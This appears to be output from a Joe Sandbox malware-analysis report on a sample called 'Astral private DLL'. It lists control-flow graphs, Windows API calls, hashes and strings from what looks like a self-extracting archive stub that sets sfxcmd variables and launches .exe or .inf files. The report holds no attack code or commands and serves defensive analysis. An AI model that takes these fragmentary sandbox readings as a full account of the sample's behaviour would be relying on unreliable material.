                                                                • Opcode ID: c5ebc91c4db4285a250973ab65c6ded3e5cbc8aab00917541273a55093ed2f52
                                                                • Instruction ID: dc7d8018097e30f5b0506a89f490d7a1312e5782074fb5695b7120acbd8896cc
                                                                • Opcode Fuzzy Hash: c5ebc91c4db4285a250973ab65c6ded3e5cbc8aab00917541273a55093ed2f52
                                                                • Instruction Fuzzy Hash: EB32F075A00218EBCF24EF68DC41AEA77B5FF19700F44425AF9059B281EBB1DEA5CB50

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0017B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0017B579
                                                                  • Part of subcall function 0017B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017B58A
                                                                  • Part of subcall function 0017B568: IsDialogMessageW.USER32(0001043C,?), ref: 0017B59E
                                                                  • Part of subcall function 0017B568: TranslateMessage.USER32(?), ref: 0017B5AC
                                                                  • Part of subcall function 0017B568: DispatchMessageW.USER32(?), ref: 0017B5B6
                                                                • GetDlgItem.USER32(00000068,001BFCB8), ref: 0017D4E8
                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,0017AF07,00000001,?,?,0017B7B9,0019506C,001BFCB8,001BFCB8,00001000,00000000,00000000), ref: 0017D510
                                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0017D51B
                                                                • SendMessageW.USER32(00000000,000000C2,00000000,001935F4), ref: 0017D529
                                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0017D53F
                                                                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0017D559
                                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0017D59D
                                                                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0017D5AB
                                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0017D5BA
                                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0017D5E1
                                                                • SendMessageW.USER32(00000000,000000C2,00000000,001943F4), ref: 0017D5F0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                • String ID: \
                                                                • API String ID: 3569833718-2967466578
                                                                • Opcode ID: 3ecfb70ae21c2b66a582bf9a847fa18a77de78196f4cff5465a885f18e21d1d7
                                                                • Instruction ID: 1075334bde6faad6358390f95a72316bc9003e042f3ca69edba22de7ea8bfba6
                                                                • Opcode Fuzzy Hash: 3ecfb70ae21c2b66a582bf9a847fa18a77de78196f4cff5465a885f18e21d1d7
                                                                • Instruction Fuzzy Hash: 3831D172145342AFE301EF20EC4AFAF7FBCEB8A748F008518F5A196591DB64CA548776

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 836 17d78f-17d7a7 call 17ec50 839 17d7ad-17d7b9 call 183e13 836->839 840 17d9e8-17d9f0 836->840 839->840 843 17d7bf-17d7e7 call 17fff0 839->843 846 17d7f1-17d7ff 843->846 847 17d7e9 843->847 848 17d812-17d818 846->848 849 17d801-17d804 846->849 847->846 851 17d85b-17d85e 848->851 850 17d808-17d80e 849->850 852 17d837-17d844 850->852 853 17d810 850->853 851->850 854 17d860-17d866 851->854 856 17d9c0-17d9c2 852->856 857 17d84a-17d84e 852->857 855 17d822-17d82c 853->855 858 17d86d-17d86f 854->858 859 17d868-17d86b 854->859 860 17d82e 855->860 861 17d81a-17d820 855->861 862 17d9c6 856->862 857->862 863 17d854-17d859 857->863 864 17d882-17d898 call 16b92d 858->864 865 17d871-17d878 858->865 859->858 859->864 860->852 861->855 868 17d830-17d833 861->868 870 17d9cf 862->870 863->851 871 17d8b1-17d8bc call 16a231 864->871 872 17d89a-17d8a7 call 171fbb 864->872 865->864 866 17d87a 865->866 866->864 868->852 873 17d9d6-17d9d8 870->873 882 17d8be-17d8d5 call 16b6c4 871->882 883 17d8d9-17d8e6 ShellExecuteExW 871->883 872->871 881 17d8a9 872->881 876 17d9e7 873->876 877 17d9da-17d9dc 873->877 876->840 877->876 880 17d9de-17d9e1 ShowWindow 877->880 880->876 881->871 882->883 883->876 885 17d8ec-17d8f9 883->885 886 17d90c-17d90e 885->886 887 17d8fb-17d902 885->887 890 17d925-17d944 call 17dc3b 886->890 891 17d910-17d919 886->891 887->886 889 17d904-17d90a 887->889 889->886 892 17d97b-17d987 CloseHandle 889->892 890->892 905 17d946-17d94e 890->905 891->890 899 17d91b-17d923 ShowWindow 891->899 893 17d989-17d996 call 171fbb 892->893 894 17d998-17d9a6 892->894 893->870 893->894 894->873 898 17d9a8-17d9aa 894->898 898->873 902 17d9ac-17d9b2 898->902 899->890 902->873 904 17d9b4-17d9be 902->904 904->873 905->892 906 17d950-17d961 GetExitCodeProcess 905->906 906->892 907 17d963-17d96d 906->907 908 17d974 907->908 909 17d96f 907->909 908->892 909->908
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0017D7AE
                                                                • ShellExecuteExW.SHELL32(?), ref: 0017D8DE
                                                                • ShowWindow.USER32(?,00000000), ref: 0017D91D
                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 0017D959
                                                                • CloseHandle.KERNEL32(?), ref: 0017D97F
                                                                • ShowWindow.USER32(?,00000001), ref: 0017D9E1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                • String ID: .exe$.inf
                                                                • API String ID: 36480843-3750412487
                                                                • Opcode ID: 34500f246f995192240f27e5f6bd822fb1810e2e70059eb931358100687262fc
                                                                • Instruction ID: 9ccdafe924f4a9c395430f4526ea95293fd6552ac0b6d3414ce6e87714ab6b15
                                                                • Opcode Fuzzy Hash: 34500f246f995192240f27e5f6bd822fb1810e2e70059eb931358100687262fc
                                                                • Instruction Fuzzy Hash: 1251F671408388AADB319B24F844BABBBF4AF95748F08841DF6C9971A1D771CAC5CB52

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 910 18a95b-18a974 911 18a98a-18a98f 910->911 912 18a976-18a986 call 18ef4c 910->912 914 18a99c-18a9c0 MultiByteToWideChar 911->914 915 18a991-18a999 911->915 912->911 919 18a988 912->919 917 18ab53-18ab66 call 17fbbc 914->917 918 18a9c6-18a9d2 914->918 915->914 920 18a9d4-18a9e5 918->920 921 18aa26 918->921 919->911 925 18aa04-18aa15 call 188e06 920->925 926 18a9e7-18a9f6 call 192010 920->926 924 18aa28-18aa2a 921->924 928 18ab48 924->928 929 18aa30-18aa43 MultiByteToWideChar 924->929 925->928 936 18aa1b 925->936 926->928 935 18a9fc-18aa02 926->935 934 18ab4a-18ab51 call 18abc3 928->934 929->928 933 18aa49-18aa5b call 18af6c 929->933 940 18aa60-18aa64 933->940 934->917 939 18aa21-18aa24 935->939 936->939 939->924 940->928 942 18aa6a-18aa71 940->942 943 18aaab-18aab7 942->943 944 18aa73-18aa78 942->944 945 18aab9-18aaca 943->945 946 18ab03 943->946 944->934 947 18aa7e-18aa80 944->947 950 18aacc-18aadb call 192010 945->950 951 18aae5-18aaf6 call 188e06 945->951 948 18ab05-18ab07 946->948 947->928 949 18aa86-18aaa0 call 18af6c 947->949 952 18ab09-18ab22 call 18af6c 948->952 953 18ab41-18ab47 call 18abc3 948->953 949->934 963 18aaa6 949->963 950->953 965 18aadd-18aae3 950->965 951->953 966 18aaf8 951->966 952->953 967 18ab24-18ab2b 952->967 953->928 963->928 968 18aafe-18ab01 965->968 966->968 969 18ab2d-18ab2e 967->969 970 18ab67-18ab6d 967->970 968->948 971 18ab2f-18ab3f WideCharToMultiByte 969->971 970->971 971->953 972 18ab6f-18ab76 call 18abc3 971->972 972->934
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00185695,00185695,?,?,?,0018ABAC,00000001,00000001,2DE85006), ref: 0018A9B5
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0018ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0018AA3B
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0018AB35
                                                                • __freea.LIBCMT ref: 0018AB42
                                                                  • Part of subcall function 00188E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0018CA2C,00000000,?,00186CBE,?,00000008,?,001891E0,?,?,?), ref: 00188E38
                                                                • __freea.LIBCMT ref: 0018AB4B
                                                                • __freea.LIBCMT ref: 0018AB70
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1414292761-0
                                                                • Opcode ID: 65941118aad9d2584f2aad0a6fcbcdf26243594fe20490d0989c5a8017ba6187
                                                                • Instruction ID: 4e8f2ab1fb2b27ed0a247b64cdc9b7fd912e25b995fe64f9b2322efd3fd4a180
                                                                • Opcode Fuzzy Hash: 65941118aad9d2584f2aad0a6fcbcdf26243594fe20490d0989c5a8017ba6187
                                                                • Instruction Fuzzy Hash: 5051C372600216ABFB29AE64CC81EBFB7AAEF44710F95462AFD04D7140DB34DE50CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 975 183b72-183b7c 976 183bee-183bf1 975->976 977 183b7e-183b8c 976->977 978 183bf3 976->978 980 183b8e-183b91 977->980 981 183b95-183bb1 LoadLibraryExW 977->981 979 183bf5-183bf9 978->979 982 183c09-183c0b 980->982 983 183b93 980->983 984 183bfa-183c00 981->984 985 183bb3-183bbc GetLastError 981->985 982->979 987 183beb 983->987 984->982 986 183c02-183c03 FreeLibrary 984->986 988 183bbe-183bd3 call 186088 985->988 989 183be6-183be9 985->989 986->982 987->976 988->989 992 183bd5-183be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                                APIs
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00183C35,?,?,001C2088,00000000,?,00183D60,00000004,InitializeCriticalSectionEx,00196394,InitializeCriticalSectionEx,00000000), ref: 00183C03
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID: api-ms-
                                                                • API String ID: 3664257935-2084034818
                                                                • Opcode ID: 0a7522f86d3880d7a96eef42e3f634efcf5c38e73f3d367abb881a95203706c0
                                                                • Instruction ID: 2d95fe281bafb2ef106570188be19f72f4f8121eec732412797419ff750f85e3
                                                                • Opcode Fuzzy Hash: 0a7522f86d3880d7a96eef42e3f634efcf5c38e73f3d367abb881a95203706c0
                                                                • Instruction Fuzzy Hash: BF11C671A45221ABCB22AB689C41B5977649F01B70F290222F935FB290E771EF408FE1

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0017081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00170836
                                                                  • Part of subcall function 0017081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0016F2D8,Crypt32.dll,00000000,0016F35C,?,?,0016F33E,?,?,?), ref: 00170858
                                                                • OleInitialize.OLE32(00000000), ref: 0017AC2F
                                                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0017AC66
                                                                • SHGetMalloc.SHELL32(001A8438), ref: 0017AC70
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                • String ID: riched20.dll$3Ro
                                                                • API String ID: 3498096277-3613677438
                                                                • Opcode ID: cb95f3205e21efc43cad6d85868d1c6b1b68b2b08b13c8d7c53e655829e84c70
                                                                • Instruction ID: 3ae200867798c05da3f0deeae3b3721e180642268b4bfda097092625e09c423c
                                                                • Opcode Fuzzy Hash: cb95f3205e21efc43cad6d85868d1c6b1b68b2b08b13c8d7c53e655829e84c70
                                                                • Instruction Fuzzy Hash: F4F01DB5D00209ABCB10AFA9D849DEFFFFCEF95700F00815AE415E2241DBB496458FA1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 997 1698e0-169901 call 17ec50 1000 169903-169906 997->1000 1001 16990c 997->1001 1000->1001 1002 169908-16990a 1000->1002 1003 16990e-16991f 1001->1003 1002->1003 1004 169927-169931 1003->1004 1005 169921 1003->1005 1006 169936-169943 call 166edb 1004->1006 1007 169933 1004->1007 1005->1004 1010 169945 1006->1010 1011 16994b-16996a CreateFileW 1006->1011 1007->1006 1010->1011 1012 16996c-16998e GetLastError call 16bb03 1011->1012 1013 1699bb-1699bf 1011->1013 1017 1699c8-1699cd 1012->1017 1019 169990-1699b3 CreateFileW GetLastError 1012->1019 1015 1699c3-1699c6 1013->1015 1015->1017 1018 1699d9-1699de 1015->1018 1017->1018 1020 1699cf 1017->1020 1021 1699e0-1699e3 1018->1021 1022 1699ff-169a10 1018->1022 1019->1015 1025 1699b5-1699b9 1019->1025 1020->1018 1021->1022 1026 1699e5-1699f9 SetFileTime 1021->1026 1023 169a12-169a2a call 170602 1022->1023 1024 169a2e-169a39 1022->1024 1023->1024 1025->1015 1026->1022
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00167760,?,00000005,?,00000011), ref: 0016995F
                                                                • GetLastError.KERNEL32(?,?,00167760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0016996C
                                                                • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00167760,?,00000005,?), ref: 001699A2
                                                                • GetLastError.KERNEL32(?,?,00167760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001699AA
                                                                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00167760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001699F9
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: File$CreateErrorLast$Time
                                                                • String ID:
                                                                • API String ID: 1999340476-0
                                                                • Opcode ID: 35920f538f76c9486f2e72ce06241b6871b8764e0ef6e366bee9b0400c064773
                                                                • Instruction ID: 1656eac7f628fa6f0a83fe6abf5079d76831b994b80e8ac395f22a79d92917fe
                                                                • Opcode Fuzzy Hash: 35920f538f76c9486f2e72ce06241b6871b8764e0ef6e366bee9b0400c064773
                                                                • Instruction Fuzzy Hash: 38313730544745AFE7309F24CC46BEABBE8BB04328F240B1DF9B1961D0D3B4A9A4CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1056 189869-189880 GetLastError 1057 18988e-189895 call 18b136 1056->1057 1058 189882-18988c call 18ae5b 1056->1058 1062 18989a-1898a0 1057->1062 1058->1057 1063 1898df-1898e6 SetLastError 1058->1063 1064 1898ab-1898b9 call 18aeb1 1062->1064 1065 1898a2 1062->1065 1066 1898e8-1898ed 1063->1066 1071 1898bb-1898bc 1064->1071 1072 1898be-1898d4 call 189649 call 188dcc 1064->1072 1067 1898a3-1898a9 call 188dcc 1065->1067 1075 1898d6-1898dd SetLastError 1067->1075 1071->1067 1072->1063 1072->1075 1075->1066
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,001891AD,0018B188,?,00189813,00000001,00000364,?,00183F73,00000050,?,001A1030,00000200), ref: 0018986E
                                                                • _free.LIBCMT ref: 001898A3
                                                                • _free.LIBCMT ref: 001898CA
                                                                • SetLastError.KERNEL32(00000000,?,001A1030,00000200), ref: 001898D7
                                                                • SetLastError.KERNEL32(00000000,?,001A1030,00000200), ref: 001898E0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_free
                                                                • String ID:
                                                                • API String ID: 3170660625-0
                                                                • Opcode ID: e902e50beb60d51f1fef20aeaf965fa361d811b612f57dd4a1e2102cd72014a6
                                                                • Instruction ID: bd476057fff8ec3c362d14f39e2a6770d89183a371157518c6081707fadae9f2
                                                                • Opcode Fuzzy Hash: e902e50beb60d51f1fef20aeaf965fa361d811b612f57dd4a1e2102cd72014a6
                                                                • Instruction Fuzzy Hash: D301F43614460A6BD3167764AC8593B256ADFE377072D0136F515A2292FF348F029F62

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1079 17b568-17b581 PeekMessageW 1080 17b583-17b597 GetMessageW 1079->1080 1081 17b5bc-17b5be 1079->1081 1082 17b599-17b5a6 IsDialogMessageW 1080->1082 1083 17b5a8-17b5b6 TranslateMessage DispatchMessageW 1080->1083 1082->1081 1082->1083 1083->1081
                                                                APIs
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0017B579
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017B58A
                                                                • IsDialogMessageW.USER32(0001043C,?), ref: 0017B59E
                                                                • TranslateMessage.USER32(?), ref: 0017B5AC
                                                                • DispatchMessageW.USER32(?), ref: 0017B5B6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Message$DialogDispatchPeekTranslate
                                                                • String ID:
                                                                • API String ID: 1266772231-0
                                                                • Opcode ID: 761a46e2873b664ab79fca934e15d1267db221222289ef7050193bc8eb77ed3e
                                                                • Instruction ID: a6a94aa47d6c7cea2643e6349e1bfbc5b7cc06b4b7313e69733cdcf358a781aa
                                                                • Opcode Fuzzy Hash: 761a46e2873b664ab79fca934e15d1267db221222289ef7050193bc8eb77ed3e
                                                                • Instruction Fuzzy Hash: 33F0DA72A0122AAB8B20ABE6EC4CEDF7FBCEF053917008415B919D2410EB34D655CBB1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1084 17abab-17abca GetClassNameW 1085 17abf2-17abf4 1084->1085 1086 17abcc-17abe1 call 171fbb 1084->1086 1088 17abf6-17abf9 SHAutoComplete 1085->1088 1089 17abff-17ac01 1085->1089 1091 17abe3-17abef FindWindowExW 1086->1091 1092 17abf1 1086->1092 1088->1089 1091->1092 1092->1085
                                                                APIs
                                                                • GetClassNameW.USER32(?,?,00000050), ref: 0017ABC2
                                                                • SHAutoComplete.SHLWAPI(?,00000010), ref: 0017ABF9
                                                                  • Part of subcall function 00171FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0016C116,00000000,.exe,?,?,00000800,?,?,?,00178E3C), ref: 00171FD1
                                                                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0017ABE9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                • String ID: EDIT
                                                                • API String ID: 4243998846-3080729518
                                                                • Opcode ID: 3d7d2b1121fdaa5b57c061996c6e731079de3c9890246647f259fd4c45647e6b
                                                                • Instruction ID: 52a5b4cae52f01c2547b3c28ef7f1e31b5f7415e25b41695a92d61207d2106b2
                                                                • Opcode Fuzzy Hash: 3d7d2b1121fdaa5b57c061996c6e731079de3c9890246647f259fd4c45647e6b
                                                                • Instruction Fuzzy Hash: FDF0823360022877DB2057649C09F9F767CAF86B40F488011BA49B3180D761EE85C5B6

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1093 17dbde-17dc09 call 17ec50 SetEnvironmentVariableW call 170371 1097 17dc0e-17dc12 1093->1097 1098 17dc36-17dc38 1097->1098 1099 17dc14-17dc18 1097->1099 1100 17dc21-17dc28 call 17048d 1099->1100 1103 17dc1a-17dc20 1100->1103 1104 17dc2a-17dc30 SetEnvironmentVariableW 1100->1104 1103->1100 1104->1098
                                                                APIs
                                                                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0017DBF4
                                                                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0017DC30
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: EnvironmentVariable
                                                                • String ID: sfxcmd$sfxpar
                                                                • API String ID: 1431749950-3493335439
                                                                • Opcode ID: a511144568233cc166beaed232023a157fd3ee55ac71780e3005c136e664d46e
                                                                • Instruction ID: 4a2b084e47e8b3a3c110dee1e5305fd2e5d346e46c64035e5f3d8c33080aa999
                                                                • Opcode Fuzzy Hash: a511144568233cc166beaed232023a157fd3ee55ac71780e3005c136e664d46e
                                                                • Instruction Fuzzy Hash: 7EF0ECB2404328ABDF221F949C06BFA3BB8AF18B85B044465BD8DA5161E7B08980D7B0
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00169795
                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 001697AD
